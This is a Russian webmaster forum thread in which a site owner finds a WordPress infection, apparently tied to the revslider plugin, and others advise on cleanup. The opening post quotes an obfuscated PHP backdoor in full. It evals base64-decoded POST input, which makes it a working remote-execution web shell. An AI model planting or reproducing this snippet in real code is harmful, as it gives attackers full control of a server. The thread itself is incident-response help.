Проверьте сайт на вирусы. Проверьте все плагины, которые ставились из сомнительных источников - Безопасность

psics · 2014-12-25T13:41:25.0000000Z

$sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]); $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); if (isset(${$s20}['n1c1ae6'])) {eval($s21(${$s20}['n1c1ae6']));} $s21 = base64_decode; $s20 = _POST; if(isset($_POST['n1c1ae6'])){ eval(base64_decode($_POST['n1c1ae6'])); } На сайте нашел такой код. Каспер при попытке открыть ругается. Похоже на вирус. Я если правильно понимаю это код То тут происходит выполнение того, что посылается в переменной n1c1ae6. Как найти что приходит сюда и из какого файла? И файл у меня на хостинге или нет?

1609

SeVlad

25 декабря 2014, 14:57

#11

awasome:
но с точки зрения удобства он никаких плюсов не дает.

Так, как их использует большинство - от них только вред.

Да, на многих сайтах слайдеры - зло. Но в некоторых случаях очень даже хорошо. Только если грамотно использовать.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

A

775

awasome

25 декабря 2014, 15:03

#12

SeVlad, я в любом случае за минимально возможное количество плагинов. Плюс сейчас в моде flat-дизайн, там слайдеры не нужны.

ER

3

erahost_ru

25 декабря 2014, 15:10

#13

awasome:
Уже не одна тема про этот слайдер была. И вообще, зачем он нужен?

у клиента без этого слайдера был перекошенвесь дизайн, у шаблона сайта, за который он отдал кучу денег(с его слов) была от него зависимость. в итоге ограничились переустановкой плагина.

Да, проверьте сайт на вебшелы и прочую гадость, т.к. чуйка говорит что то что было найдено это уже следствие взлома а не причина. Проверьет остальные плагины, особенно которые ставились из сомнительных источников. чем быстрее проверите, тем больше вероятность избежать проблем, с тем же спамом например.

erahost.ru (http://erahost.ru) - хостинг на ssd от 1$, тестирование - 7 дней, домен - бесплатно.

Проблема с Wordpress Тема WP под адсенс Как ведет себя WP

1609

SeVlad

25 декабря 2014, 15:36

#14

awasome:
я в любом случае за минимально возможное количество плагинов.

Плагинопаронойя лечится изучением матчасти :)

awasome:
Плюс сейчас в моде flat-дизайн, там слайдеры не нужны.

Мода - вещь проходящая (как мода и на слайдеры). А вот гармония - вечна. Слайдер тоже может быть в гармонии с дизом и задачами сайта :).

ЗЫ. Блин. звучит так, как будто я ярый сторонник слайдеров :) Нет! Я в большинстве своём противник их. Только в очень редких случаях их применение целесообразно.

Начисление "Прибыли" в AdSense. Меню на CSS слайдере. Тайное знание или о

130

psics

25 декабря 2014, 16:13

#15

erahost_ru:
недавно у одного клиента так же была проблема с этим же плагином.. revslider. похоже плагин уязвим. спама еще небыло с сайта? Установите самую новую версию плагина и проверьте все плагины на сайте. Например в моем случае вирь был еще в wp-content/plugins/backupwordpress/assets/ файлы diff.php menu.php , антивирусы их не брали. проверьте файлы сайта на последние изменения

да именно спам и спалил)

---------- Добавлено 25.12.2014 в 18:21 ----------

SeVlad:
Не правильный вывод - нет взаимосвязи :) Не факт что нет виря, а сторонний ресурс или нет посылает ПОСТ тебе скажет ИП, который ты не показал строке лога (и показывать не нужно - просто сравни с ИП своего сервака).
Кроме того лучше получить само тело запроса. Оно тоже должно быть в логах, но для этого нужно повышать (или понижать - я не знаю как где будет правильно ;) ) уровень логирования

---------- Добавлено 25.12.2014 в 17:29 ----------

батенька, да он же больной. Ну т.е. его старые версии.

ip был хостинга. И файл

Распознать поражение сайта вредоносным ПО можно оценив наличие файла wp-includes/js/swobject.js

есть. А вот

wp-includes/template-loader.php новой функции "FuncQueueObject".

- нету. Это норм?

---------- Добавлено 25.12.2014 в 18:28 ----------

И так мои дальнейшие действия:

1 - удалить файл c который написан выше? (не будет ли последствий после удаления)

2 - на все файлы поставить права 644? (будет ли норм работать вп?)

3. все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает

deny from all

4. удаляем все ненужные плагины и шаблоны

5. обновляем cms и оставшиеся плагины до свежих версий

6. сканируем свой комп на вирусы Касперским и AVZ (каспер ничего не видит и в текущем варианте)

7. после проверки компьютера на вирусы меняем все пароли у сайта и хостинга (включая пароль от БД). И делаем это раз в два месяца хотя бы.

Общая тема о борьбе Загрузка объекта содержащего опасную Вирус на компе (вешает

1609

SeVlad

25 декабря 2014, 16:57

#16

psics:
Это норм?

Я не юзаю этот плаг. Тем более что он коммерческий, а тянуть всякую Г с помоек (особенно при наличии альтернатив) я как-то желанием не горю :)

psics:
И так мои дальнейшие действия:

1. Обновить плаг (а лучше заменить на честный из оф репо или вообще выкинуть слайдер на помойку прошлого :) )

2. Сравнить оригинальные файлы дистра+плагов+темы с тем, что на сайте (спец ПО для синхронизации или правильным файл-менеджером)

3. Просканировать новые (относительно п2) файлы айболитом

4. Посмотреть глазками верхние каталоги на сервере (СПанель?) на наличие левых\подозрительных названий файлов.

Проверить свой ПК и смену паролей, конечно не плохо, но в данном случае оно не связано.

Постоянно взламывают сайты на Тормозит WordPress. 900+ запросов Нужно ли обновлять php

130

psics

25 декабря 2014, 17:20

#17

SeVlad:
Я не юзаю этот плаг. Тем более что он коммерческий, а тянуть всякую Г с помоек (особенно при наличии альтернатив) я как-то желанием не горю :)

1. Обновить плаг (а лучше заменить на честный из оф репо или вообще выкинуть слайдер на помойку прошлого :) )
2. Сравнить оригинальные файлы дистра+плагов+темы с тем, что на сайте (спец ПО для синхронизации или правильным файл-менеджером)
3. Просканировать новые (относительно п2) файлы айболитом
4. Посмотреть глазками верхние каталоги на сервере (СПанель?) на наличие левых\подозрительных названий файлов.

Проверить свой ПК и смену паролей, конечно не плохо, но в данном случае оно не связано.

Подумаю о смене плагина. Или сам напишу корявый слайдер))

Я проверял не ПК. А скачал на локальный комп сайт и проверял ту папку

ER

3

erahost_ru

25 декабря 2014, 17:30

#18

psics:

2 - на все файлы поставить права 644? (будет ли норм работать вп?)

в смысле? а у вас какие сейчас стоят?

Начните со смены пароля администратора

Проверьте файлы сайта айболитом

Если есть возможность, попросите хостера проверить файлы антивирусами, clam или avg. что кстати Вам хостер предлагает по защите?

Пробегитесь по папкам глазами или если есть доступ к shell через find сделайте поиск последних менявшихся файлов за последние пару дней.

Да, движок WP обновить до самой крайней версии.

По поводу взломанных коммерческих плагинов и тем , в них изначально могут быть трояны и бекдоры.

Ну и удачи Вам. желаю победить заразу... очень неприятная ситуация.. особенно если из аз спама перед праздниками пострадает сайт...

Помогите усыновителям, сайт хакнули вирусы на сайте Панель админки на Джумла

1609

SeVlad

25 декабря 2014, 18:31

#19

psics:
Я проверял не ПК. А скачал на локальный комп сайт и проверял ту папку

Виндовые антивири тут плохие помощники.

130

psics

26 декабря 2014, 07:32

#20

SeVlad:

батенька, да он же больной.

всю ночь не спал, думал откуда эта фразка то)

вспомнил с Маши и медведя)

Тоже дети?)))

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах

Что делать, если ваша email-рассылка попала в спам

Вирусы